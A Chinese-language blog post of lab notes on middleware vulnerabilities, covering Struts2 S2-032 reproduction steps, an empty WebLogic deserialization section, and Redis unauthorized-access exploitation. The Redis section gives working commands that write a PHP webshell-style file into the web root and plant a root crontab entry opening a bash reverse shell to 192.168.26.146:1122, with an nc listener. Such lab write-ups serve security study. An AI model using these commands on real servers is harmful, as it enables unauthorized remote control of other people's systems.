Loading

中间件漏洞

struts2漏洞

Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。Struts 2是Struts的下一代产品,是在 struts 1和WebWork的技术基础上进行了合并的全新的Struts 2框架

漏洞挖掘

找到站点xx.action的URL

环境搭建

  • 配置jre环境

  • 安装xamppinstaller继承环境工具

Struts2 2016 s2-032漏洞复现

  • 把漏洞源码放入工作目录下

  • 启动Tomcat服务

  • 访问默认站点 http://ip:8080/

  • 方法漏洞项目 http://ip:8080/struts0808/

  • 选择用户登入-输入表单内容-提交

复制带有action的URL

  • 使用struts2漏洞检测工具

 

Java 反序列漏洞

环境搭建

  • 安装WebLogic 10.3 并启动服务

漏洞复现

Redis漏洞

环境搭建

  • 安装redis

yum -y install gcc
wget http://download.redis.io/releases/redis-3.2.11.tar.gz 
mkdir /etc/redis
tar xzf redis-3.2.11.tar.gz
cd redis-3.2.11
make
cd src/
cp redis-server redis-cli /usr/bin/
cd ..
cp redis.conf /etc/redis/
  • 修改配置

vim /etc/redis/redis.conf
protected-mode no
bind 0.0.0.0
  • 启动服务

redis-server /etc/redis/redis.conf &

Redis漏洞利用

利用Redis写一句话

写webshell文件实现远程控制

假如目标时PHP环境,web 的根目录为/var/www/html

 

$ redis-cli -p 6379
127.0.0.1:6379> CONFIG SET dbfilename phpinfo.php
OK
127.0.0.1:6379> CONFIG SET dir "/var/www/html"
OK
127.0.0.1:6379> CONFIG SET rdbcompression no
OK
127.0.0.1:6379> SET phpinfo"\n\n <?php phpinfo(); ?> \n\n" NX
OK
127.0.0.1:6379> save
OK

/var/www/html目录下写入phpinfo.php文件

 

利用Redis反弹shell

127.0.0.1:6379> set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.26.146/1122 0>&1\n\n\n\n"
OK
127.0.0.1:6379> config set dir /etc/
OK
127.0.0.1:6379> config set dbfilename crontab
OK
127.0.0.1:6379> save
  • kali 监听1122端口

nc -l -p 1122

 

posted @ 2018-04-27 15:11  KubeSec  阅读(5704)  评论(0编辑  收藏  举报